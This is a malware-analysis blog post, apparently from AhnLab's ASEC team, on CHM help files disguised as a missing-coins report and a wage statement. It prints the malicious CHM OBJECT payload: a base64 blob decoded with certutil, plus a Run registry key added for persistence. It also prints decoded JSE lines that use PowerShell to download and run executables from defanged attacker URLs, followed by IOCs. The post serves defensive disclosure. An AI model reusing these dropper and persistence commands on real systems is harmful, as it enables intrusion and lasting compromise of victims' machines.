Malicious Help File Disguised as Missing Coins Report and Wage Statement (*.chm)

The ASEC analysis team has discovered a continuous distribution of malware disguised as a Windows Help File (*.chm). The most recent CHM file is identical to the file introduced in <APT Attack Being Distributed as Windows Help File (*.chm)> to download the additional malware.

It appears that the CHM file of this type is distributed in the form of a compressed file. The confirmed filenames of the compressed files and internal CHM files are as follows:

Names of Compressed FilesNames of Internal CHM Files
Missing Coins Info.ziplost.chm
Data.zipDefault.chm
Wage Statement.rarsalary.chm
Table 1. Confirmed Filenames

Missing Coins Info.zip file contains the following additional compressed file and Word file.

Figure 1. Files inside Missing Coins Info.zip

The Word file is an innocuous file that contains text related to missing coins (see Figure below).

Figure 2. Word file

Find Missing Coins.rar contains lost.chm, and when it is run, it creates Help with content related to coins and performs malicious activities.

Figure 3. Inside Find Missing Coins.rar

Figure 4. Executed lost.chm

Inside the lost.chm file is the same HTML file and the internal special command introduced in the previous blog post. As such, running the CHM file results in the execution of the cmd command and the creation of Document.dat and Document.jse in the %USERPROFILE%\Links\ folder. The difference from the previous is that Document.jse is created instead of Document.vbs.

<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=',cmd, /c echo I0B+XnZBQUFBQT09LW1EfmsnCStoLGIxT2s3K3ByKExuXkRgSnFqbU1rd0QganR/Vl5KYmlAI0AmN2wuUDF4SjE6W35KbVAyR1MrLi80bl5WfmJoTVBPS0VEV1B1WWh3dS13XmtEL2sgK1grUDRPT3drKUp6V1dhcn80bk5jXldzeltDRGw0Q2R/els0YzI0d19EWGErJzhQTH4vRGwuWSxdT2hhXS0nXi9NLy9jbmErcmlAI0AmZFIuOwlgXn5aUzBtVmRuKmkyRDRBQUE9PV4jfkAA > "%USERPROFILE%\Links\Document.dat" & start /MIN certutil -decode "%USERPROFILE%\Links\Document.dat" "%USERPROFILE%\Links\Document.jse" & start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "%USERPROFILE%\Links\Document.jse" /f'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
shortcut.Click();
</SCRIPT>

The data that exists in Document.dat is base64-decoded and saved as Document.jse. The decoded JSE data then uses powershell to download the additional file from a certain URL and runs it (see below).

var s=new ActiveXObject("WScript.Shell");
var c="cmd /c powershell iwr -outf %tmp%\\csrss.exe hxxps://foxiebed[.]com/database/db.php?type=1 & start %tmp%\\csrss.exe";
s.run(c,0,false);

Afterward, it adds %USERPROFILE%\Links\Document.jse to HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to ensure that the JSE file can be continuously run.

The following CHM files were found subsequently.

  • Wage Statement.rar – salary.chm
Figure 5. Executed salary.chm

(new ActiveXObject(“WScript.Shell”)).run(“cmd /c powershell iwr -outf %tmp%\\sihost.exe hxxps://cerebrovascular[.]net/resource/post & start %tmp%\\sihost.exe mLzio512pQo”,0,false)
Data of decoded Document.jse

  • Data.zip – Default.chm

This file is compressed with an innocuous PDF file, in a similar fashion to the aforementioned Missing Coins Info.zip.

Figure 8. Innocuous PDF file

Figure 9. Executed Default.chm

(new ActiveXObject(“WScript.Shell”)).run(“cmd /c powershell iwr -outf %tmp%\\lsass.exe hxxps://trueliebe[.]com/kettle/pot & start %tmp%\\lsass.exe Dmzei125oAl”,0,false)
Data of decoded Document.jse

The team could not find extra files because the access to the download URL is currently blocked, but users must stay vigilant as the attack may upload various malicious files in the future.

AhnLab’s anti-malware product, V3, detects and blocks the malware using the alias below.

[File Detection]
Trojan/CHM.Agent

[IOC]
aac428717f4b5ea1bfac9ae0998e661c
7467a360837a85ace6e14acc879e00e5
13446d8496858c2eac78e5e985af605b
hxxps://foxiebed[.]com/database/db.php?type=1
hxxps://cerebrovascular[.]net/resource/post
hxxps://trueliebe[.]com/kettle/pot

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:

5 1 vote
Article Rating
guest

1 Comment
Inline Feedbacks
View all comments